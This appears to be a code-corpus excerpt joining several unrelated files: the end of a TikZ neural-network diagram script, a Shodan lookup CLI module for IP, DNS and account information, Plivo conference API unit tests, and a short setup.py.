'conv_65', anchor_of='', anchor_to='-far', options='pos=0.6') arch += blocks.sum(name='sum_3', prev='up_2', offset=(-3, 0, 0), conn=False) arch += tikz.short_connection('conv_65', 'sum_3', anchor_of='-near', anchor_to='-northeast') arch += tikz.short_connection('up_2', 'sum_3', anchor_of='-west', anchor_to='-east') arch += tikz.z_conv_relu(name='conv_66', to='up_2-nearsouthwest', offset=(-0.65, 0, 3), size=(input / 4, input / 4), n_filter=512) arch += tikz.short_connection(of='up_2', to='conv_66', anchor_of='-nearsouthwest', anchor_to='-far', fill='') arch += tikz.z_conv_relu(name='up_3', to='sum_3-southwest', offset=(-0.75, 0, 6), size=(input / 4, input / 4), n_filter=512) arch += tikz.short_connection(of='sum_3', to='up_3', anchor_of='-southwest', anchor_to='-far', fill='') arch += blocks.conc(name='conc_2', prev='conv_62', offset=(-11, 0.5, 0), conn=False) arch += tikz.z_connection(of='conv_60', to='conv_62', anchor_of='-nearwest', anchor_to='-east', shift=(-1, -2, 4)) arch += tikz.z_connection(of='conv_64', to='conc_2', anchor_of='-near', anchor_to='-east', shift=(-1, -1.45, 2.75)) arch += tikz.short_connection(of='conv_62', to='conc_2', anchor_of='-east', anchor_to='-south') arch += tikz.z_connection(of='conv_66', to='conc_2', anchor_of='-near', anchor_to='-northeast', shift=(0, 0, 0)) arch += tikz.z_connection(of='up_3', to='conc_2', anchor_of='-near', anchor_to='-west', shift=(0, 0, 6)) arch += blocks.conv_relu(name='conv_67', prev='conc_2', n_filter=512, size=(input / 4, input / 4), rtl=True, offset=(-4, 0, 8), conn=False) arch += tikz.z_connection(of='conc_2', to='conv_67', anchor_of='-southwest', anchor_to='-east', shift=(0, 0, 7.1)) arch += blocks.conv_relu(name='conv_68', prev='conv_67', n_filter='27', width=2, size=(input / 4, input / 4), rtl=True, offset=(-3.5, 0, 0), anchor='-west', anchor_to='-east') arch += tikz.soft_max('soft_max', offset=(-2, 0, 0), to='conv_68', size=(input / 4, input / 4), n_filter=1, anchor_to='-west') arch += tikz.short_connection('conv_68', 'soft_max', anchor_of='-west', anchor_to='-east') arch += tikz.results_upsampling() arch += tikz.spatial_mask() arch += tikz.legend() # arch += tikz.resample('image_1', 'image_2') # arch += tikz.short_connection(of='conv_61', to='sum_1', anchor_of='-east', # anchor_to='-west') # arch += tikz.resample('image_1', 'image_2') # Close environment arch += tikz.env_end() return arch def main(): pdf = False namefile = str(sys.argv[0]).split('.')[0] arch = create_architecture() # to_Generate(arch, namefile + '.tex') content = execute.build_architecture(arch) execute.write_tex(content, namefile + ".tex") if pdf: execute.tex_to_pdf(namefile + ".tex") if sys.platform.startswith('linux'): execute.open_pdf('xdg-open', os.path.join(namefile + '.pdf')) elif sys.platform.startswith('win32'): os.startfile(os.path.join(namefile + '.pdf')) if __name__ == '__main__': main()
2.3125
2
src/shodan.py
throne/throne-cli
4
12789748
<filename>src/shodan.py # LICENSED UNDER BSD-3-CLAUSE-CLEAR LICENSE # SEE PROVIDED LICENSE FILE IN ROOT DIRECTORY # Import Third Party Modules import logging import click import yaml import os from pathlib import Path # Import Throne Modules from src.parsers import json_request, shodan_parser from src.exceptions import ThroneFormattingError, ThroneConfigError # Set log variable for verbose output log = logging.getLogger(__name__) # Get home directory home = os.path.expanduser("~") config_file = f'{home}/.throne/config.yml' try: config = yaml.safe_load(open(config_file)) shodan_apikey = config['shodan_key'] except: pass # URLs SHODAN_HOST = 'https://api.shodan.io/shodan/host/' SHODAN_INFO = 'https://api.shodan.io/api-info' SHODAN_TOOLS = 'https://api.shodan.io/tools/' SHODAN_DNS = 'https://api.shodan.io/dns/' @click.group() def shodan(): """ Retrieve information from Shodan. """ pass @shodan.command() def setapi(): """ Use this command to set your Shodan API key. """ try: if not os.path.exists(f"{home}/.throne"): os.makedirs(f"{home}/.throne") Path(f'{home}/.throne/config.yml').touch() apikey_input = input("Enter Shodan API Key: ") shodan_apikey = {'shodan_key': f"{apikey_input}"} with open(f"{home}/.throne/config.yml", 'r+') as throne_config: if os.stat(config_file).st_size == 0: yaml.safe_dump(shodan_apikey, throne_config) else: config = yaml.safe_load(throne_config) config.update(shodan_apikey) yaml.safe_dump(shodan_apikey, throne_config) click.secho("Successfully set Shodan API key.", fg="green") except: raise ThroneConfigError("Failed to set Shodan API key.") @shodan.command(hidden=True) @click.argument('address', nargs=1, metavar="IP_ADDRESS") def test(address): """ This command prints raw JSON information for IP addresses\n from Shodan. """ url = '{0}{1}?key={2}'.format(SHODAN_HOST, address, shodan_apikey) response = json_request._JSONRequest().get_json(url=url) print(response) @shodan.command() @click.option('--raw', '-r', is_flag=True) def info(raw): """ Return information about the plan belonging to\n the provided API key. """ try: url = '{0}?key={1}'.format(SHODAN_INFO, shodan_apikey) except NameError: raise ThroneConfigError("Is your API key set? Run `throne shodan setapi` to set your API key.") response = json_request._JSONRequest().get_json(url=url) parse_json = shodan_parser._APIInfo(response) parse_json.parse() result = parse_json.vars if raw: click.echo(result) else: click.secho("---Shodan API Info---", fg="green") click.echo(f"Shodan API Plan: {result['plan'].upper()}") click.echo(f"Total Scan Credits: {result['scan_limit']}\n Used Credits: {result['used_scan_credits']}\n Unused Credits: {result['scan_credits']}") click.echo(f"Total Query Credits {result['query_limit']}\n Used Credits: {result['used_query_credits']}\n Unused Credits: {result['query_credits']}") click.echo(f"Monitored IPs: {result['monitored_ips']}\n Monitored IP Limit: {result['ip_limit']}") click.echo(f"Unlocked: {result['unlocked']}\n Unlocked Left: {result['unlocked_left']}") @shodan.command() @click.option('--raw', '-r', is_flag=True) def myip(raw): """ Get your current public IP address. """ try: url = '{0}myip?key={1}'.format(SHODAN_TOOLS, shodan_apikey) except NameError: raise ThroneConfigError("Is your API key set? Run `throne shodan setapi` to set your API key.") response = json_request._JSONRequest().get_json(url=url) if raw: click.echo(response) else: click.secho("---Public IP Address---", fg="green") click.echo(f"{response}") @shodan.command() @click.option( '--query-type', '-q', type=click.Choice(['resolve', 'reverse', 'domain'], case_sensitive=False), help="Query type: Resolve DNS, Resolve Reverse DNS, or Get Domain Information" ) @click.option('--raw', '-r', is_flag=True) @click.argument('query', metavar="query", nargs=-1) def dns(query_type, query, raw): """ Host to IP, IP to Host, Domain DNS information. """ try: query_list = [] for domain in query: query_list.append(domain) query = ','.join(query_list) if query_type is None: click.secho("You must specify a --query-type/-q option! View 'throne shodan dns --help' for more information.", fg="red") exit() elif "reverse" in query_type: url = '{0}reverse?ips={1}&key={2}'.format(SHODAN_DNS, query, shodan_apikey) elif "domain" in query_type: if len(query_list) > 1: raise ThroneFormattingError("Only 1 domain can be specified! Remove the others and try again.") url = '{0}domain/{1}?key={2}'.format(SHODAN_DNS, query, shodan_apikey) elif "resolve" in query_type: url = '{0}resolve?hostnames={1}&key={2}'.format(SHODAN_DNS, query, shodan_apikey) except NameError: raise ThroneConfigError("Is your API key set? Run `throne shodan setapi` to set your API key.") response = json_request._JSONRequest().get_json(url=url) parse_json = shodan_parser._DNS(json_result=response, query_type=query_type) parse_json.parse() results = parse_json.vars if raw: click.echo(results) else: click.secho("---Shodan DNS Results---", fg="yellow") if "reverse" in query_type: for result in results['result']: click.secho(f"{result['ip']}", fg="red", nl=False) click.secho(" resolves to ", nl=False) click.secho(f"{result['hostname']}", fg="red") if "resolve" in query_type: for result in results['result']: click.secho(f"{result['hostname']}", fg="red", nl=False) click.secho(" resolves to ", nl=False) click.secho(f"{result['ip']}", fg="red") if "domain" in query_type: domain_tags = ', '.join(results['tags']) subdomains = ', '.join(results['subdomains']) all_domains = [] types = [] records = [] click.secho("Domain: ", fg="green", nl=False) click.echo(f"{results['domain']}") click.secho("Shodan Tags: ", fg="green", nl=False) click.echo(f"{domain_tags}") click.secho("Subdomains: ", fg="green", nl=False) click.echo(f"{subdomains}") for domains in results['records']: for domain in domains.items(): all_domains.append(domain[0]) for record in domain[1]: records.append(record) record_types = record['type'] if record_types not in types: types.append(record_types) else: pass for domain in all_domains: click.secho(f"--{domain} Records--", fg="magenta") for record in records: if (record['domain'] == domain) and (record['type'] == "A"): click.echo("A Records:") break for record in records: if (record['domain'] == domain) and (record['type'] == "A"): ports = ', '.join((str(x) for x in record['ports'])) if ports == "": click.echo(f" Value: {record['value']} | Last Seen: {record['last_seen']}") else: click.echo(f" Value: {record['value']}", nl=False) click.echo(f" | Ports Opened: {ports} | Last Seen: {record['last_seen']}") for record in records: if (record['domain'] == domain) and (record['type'] == "AAAA"): click.echo("AAAA Records:") break for record in records: if (record['domain'] == domain) and (record['type'] == "AAAA"): ports = ', '.join((str(x) for x in record['ports'])) if ports == "": click.echo(f" Value: {record['value']} | Last Seen: {record['last_seen']}") else: click.echo(f" Value: {record['value']}", nl=False) click.echo(f" | Ports Opened: {ports} | Last Seen: {record['last_seen']}") for record in records: if (record['domain'] == domain) and (record['type'] == "CNAME"): click.echo("CNAME Records:") break for record in records: if (record['domain'] == domain) and (record['type'] == "CNAME"): ports = ', '.join((str(x) for x in record['ports'])) if ports == "": click.echo(f" Value: {record['value']} | Last Seen: {record['last_seen']}") else: click.echo(f" Value: {record['value']}", nl=False) click.echo(f" | Ports Opened: {ports} | Last Seen: {record['last_seen']}") for record in records: if (record['domain'] == domain) and (record['type'] == "MX"): click.echo("MX Records:") break for record in records: if (record['domain'] == domain) and (record['type'] == "MX"): ports = ', '.join((str(x) for x in record['ports'])) if ports == "": click.echo(f" Value: {record['value']} | Last Seen: {record['last_seen']}") else: click.echo(f" Value: {record['value']}", nl=False) click.echo(f" | Ports Opened: {ports} | Last Seen: {record['last_seen']}") for record in records: if (record['domain'] == domain) and (record['type'] == "NS"): click.echo("NS Records:") break for record in records: if (record['domain'] == domain) and (record['type'] == "NS"): ports = ', '.join((str(x) for x in record['ports'])) if ports == "": click.echo(f" Value: {record['value']} | Last Seen: {record['last_seen']}") else: click.echo(f" Value: {record['value']}", nl=False) click.echo(f" | Ports Opened: {ports} | Last Seen: {record['last_seen']}") for record in records: if (record['domain'] == domain) and (record['type'] == "PTR"): click.echo("PTR Records:") break for record in records: if (record['domain'] == domain) and (record['type'] == "PTR"): ports = ', '.join((str(x) for x in record['ports'])) if ports == "": click.echo(f" Value: {record['value']} | Last Seen: {record['last_seen']}") else: click.echo(f" Value: {record['value']}", nl=False) click.echo(f" | Ports Opened: {ports} | Last Seen: {record['last_seen']}") for record in records: if (record['domain'] == domain) and (record['type'] == "CERT"): click.echo("CERT Records:") break for record in records: if (record['domain'] == domain) and (record['type'] == "CERT"): ports = ', '.join((str(x) for x in record['ports'])) if ports == "": click.echo(f" Value: {record['value']} | Last Seen: {record['last_seen']}") else: click.echo(f" Value: {record['value']}", nl=False) click.echo(f" | Ports Opened: {ports} | Last Seen: {record['last_seen']}") for record in records: if (record['domain'] == domain) and (record['type'] == "SRV"): click.echo("SRV Records:") break for record in records: if (record['domain'] == domain) and (record['type'] == "SRV"): ports = ', '.join((str(x) for x in record['ports'])) if ports == "": click.echo(f" Value: {record['value']} | Last Seen: {record['last_seen']}") else: click.echo(f" Value: {record['value']}", nl=False) click.echo(f" | Ports Opened: {ports} | Last Seen: {record['last_seen']}") for record in records: if (record['domain'] == domain) and (record['type'] == "TXT"): click.echo("TXT Records:") break for record in records: if (record['domain'] == domain) and (record['type'] == "TXT"): ports = ', '.join((str(x) for x in record['ports'])) if ports == "": click.echo(f" Value: {record['value']} | Last Seen: {record['last_seen']}") else: click.echo(f" Value: {record['value']}", nl=False) click.echo(f" | Ports Opened: {ports} | Last Seen: {record['last_seen']}") for record in records: if (record['domain'] == domain) and (record['type'] == "SOA"): click.echo("SOA Records:") break for record in records: if (record['domain'] == domain) and (record['type'] == "SOA"): ports = ', '.join((str(x) for x in record['ports'])) if ports == "": click.echo(f" Value: {record['value']} | Last Seen: {record['last_seen']}") else: click.echo(f" Value: {record['value']}", nl=False) click.echo(f" | Ports Opened: {ports} | Last Seen: {record['last_seen']}") for record in records: if (record['domain'] == domain) and (record['type'] == "DNSKEY"): click.echo("DNSKEY Records:") break for record in records: if (record['domain'] == domain) and (record['type'] == "DNSKEY"): ports = ', '.join((str(x) for x in record['ports'])) if ports == "": click.echo(f" Value: {record['value']} | Last Seen: {record['last_seen']}") else: click.echo(f" Value: {record['value']}", nl=False) click.echo(f" | Ports Opened: {ports} | Last Seen: {record['last_seen']}") @shodan.command() @click.option('--raw', '-r', is_flag=True) @click.option('--all', '-a', is_flag=True) @click.argument('query', metavar="query", nargs=1) def search(query, raw, all): """ Get information for a specified IP address. """ url = '{0}{1}?key={2}'.format(SHODAN_HOST, query, shodan_apikey) response = json_request._JSONRequest().get_json(url=url) parse_json = shodan_parser._IPSearch(json_result=response, query=query) parse_json.parse() results = parse_json.vars if raw: click.echo(results) else: # Shared Variables # Top-Level (TL) Variables domains = ', '.join((str(x) for x in results['domains'])) hostnames = ', '.join((str(x) for x in results['hostnames'])) ports = ', '.join((str(x) for x in results['ports'])) protocols = ', '.join((str(x) for x in results['protocols'])) click.secho(f"---Shodan Results For {results['query']}---", fg="yellow") click.echo(f"Data Last Updated: {response['last_update']}") click.echo(f"ASN: {response['asn']}") click.echo(f"ISP: {response['isp']}") click.echo(f"Location: {results['location']}") click.echo(f" Lat/Long: {results['coords']}") click.echo(f"Domain(s): {domains}") click.echo(f"Hostname(s): {hostnames}") click.echo(f"Port(s): {ports}") click.echo(f"Found Protocols: {protocols}") for protocol in results['protocols']: click.secho(f"--{protocol} Information--", fg="yellow") for idx, entry in enumerate(results['data'][protocol]): hostnames = ', '.join((str(x) for x in entry['hostnames'])) domains = ', '.join((str(x) for x in entry['domains'])) if idx > 0: click.echo("--") click.echo(f"IP: {entry['ip']}\nPort: {entry['port']}\nHostnames: {hostnames}\nDomains: {domains}")
1.976563
2
tests/resources/test_conferences.py
vaibhav-plivo/plivo-python
0
12789749
<reponame>vaibhav-plivo/plivo-python<filename>tests/resources/test_conferences.py # -*- coding: utf-8 -*- from tests.decorators import with_response from .. import PlivoResourceTestCase conference_name = 'My Conf Room' member_id = 'Test Member ID' class ConferenceTest(PlivoResourceTestCase): @with_response(200) def test_get(self): conference = self.client.conferences.get(conference_name) self.assertResponseMatches(conference) self.assertEqual(self.client.current_request.method, 'GET') self.assertUrlEqual( self.get_url('Conference', conference_name), self.client.current_request.url) self.assertEqual(conference.conference_name, conference_name) @with_response(204) def test_delete(self): self.client.conferences.delete(conference_name) self.assertEqual(self.client.current_request.method, 'DELETE') self.assertUrlEqual( self.get_url('Conference', conference_name), self.client.current_request.url) @with_response(204) def test_delete_all(self): self.client.conferences.delete_all() self.assertEqual(self.client.current_request.method, 'DELETE') self.assertUrlEqual( self.get_url('Conference'), self.client.current_request.url) @with_response(204, method_name='delete') def test_hangup(self): self.client.conferences.hangup(conference_name) self.assertEqual(self.client.current_request.method, 'DELETE') self.assertUrlEqual( self.get_url('Conference', conference_name), self.client.current_request.url) @with_response(204, method_name='delete_all') def test_hangup_all(self): self.client.conferences.hangup_all() self.assertEqual(self.client.current_request.method, 'DELETE') self.assertUrlEqual( self.get_url('Conference'), self.client.current_request.url) @with_response(200) def test_list(self): self.client.conferences.list() self.assertEqual(self.client.current_request.method, 'GET') self.assertUrlEqual( self.get_url('Conference'), self.client.current_request.url) @with_response(202) def test_record_create(self): self.client.conferences.record( conference_name=conference_name, file_format='mp3', transcription_url='http://example.transcription.url') self.assertEqual(self.client.current_request.method, 'POST') self.assertUrlEqual( self.get_url('Conference', conference_name, 'Record'), self.client.current_request.url) @with_response(204) def test_record_delete(self): self.client.conferences.record_stop(conference_name=conference_name) self.assertEqual(self.client.current_request.method, 'DELETE') self.assertUrlEqual( self.get_url('Conference', conference_name, 'Record'), self.client.current_request.url) class ConferenceMemberTest(PlivoResourceTestCase): @with_response(202) def test_deaf_create(self): self.client.conferences.member_deaf( conference_name=conference_name, member_id=member_id) self.assertEqual(self.client.current_request.method, 'POST') self.assertUrlEqual( self.get_url('Conference', conference_name, 'Member', member_id, 'Deaf'), self.client.current_request.url) @with_response(202) def test_speak_create(self): self.client.conferences.member_speak( conference_name=conference_name, member_id=member_id, text='Hello World!') self.assertEqual(self.client.current_request.method, 'POST') self.assertUrlEqual( self.get_url('Conference', conference_name, 'Member', member_id, 'Speak'), self.client.current_request.url) @with_response(202) def test_play_create(self): self.client.conferences.member_play( conference_name=conference_name, member_id=member_id, url='http://url.to.sound') self.assertEqual(self.client.current_request.method, 'POST') self.assertUrlEqual( self.get_url('Conference', conference_name, 'Member', member_id, 'Play'), self.client.current_request.url) @with_response(202) def test_mute_create(self): self.client.conferences.member_mute( conference_name=conference_name, member_id=member_id) self.assertEqual(self.client.current_request.method, 'POST') self.assertUrlEqual( self.get_url('Conference', conference_name, 'Member', member_id, 'Mute'), self.client.current_request.url) @with_response(204) def test_mute_delete(self): self.client.conferences.member_mute_stop( conference_name=conference_name, member_id=member_id) self.assertEqual(self.client.current_request.method, 'DELETE') self.assertUrlEqual( self.get_url('Conference', conference_name, 'Member', member_id, 'Mute'), self.client.current_request.url) @with_response(204) def test_deaf_delete(self): self.client.conferences.member_deaf_stop( conference_name=conference_name, member_id=member_id) self.assertEqual(self.client.current_request.method, 'DELETE') self.assertUrlEqual( self.get_url('Conference', conference_name, 'Member', member_id, 'Deaf'), self.client.current_request.url) @with_response(204) def test_speak_delete(self): self.client.conferences.member_speak_stop( conference_name=conference_name, member_id=member_id) self.assertEqual(self.client.current_request.method, 'DELETE') self.assertUrlEqual( self.get_url('Conference', conference_name, 'Member', member_id, 'Speak'), self.client.current_request.url) @with_response(204) def test_play_delete(self): self.client.conferences.member_play_stop( conference_name=conference_name, member_id=member_id) self.assertEqual(self.client.current_request.method, 'DELETE') self.assertUrlEqual( self.get_url('Conference', conference_name, 'Member', member_id, 'Play'), self.client.current_request.url) @with_response(202) def test_kick_create(self): self.client.conferences.member_kick( conference_name=conference_name, member_id=member_id) self.assertEqual(self.client.current_request.method, 'POST') self.assertUrlEqual( self.get_url('Conference', conference_name, 'Member', member_id, 'Kick'), self.client.current_request.url) @with_response(204) def test_delete(self): self.client.conferences.member_hangup( conference_name=conference_name, member_id=member_id) self.assertEqual(self.client.current_request.method, 'DELETE') self.assertUrlEqual( self.get_url('Conference', conference_name, 'Member', member_id), self.client.current_request.url)
2.390625
2
setup.py
jntme/twjnt
0
12789750
from distutils.core import setup setup( name='twjnt', version='0.0.1', packages=[''], url='', license='MIT', author='jntme', author_email='<EMAIL>', description='A simple tool that offers some features to administrate your twitter account.' )
1.125
1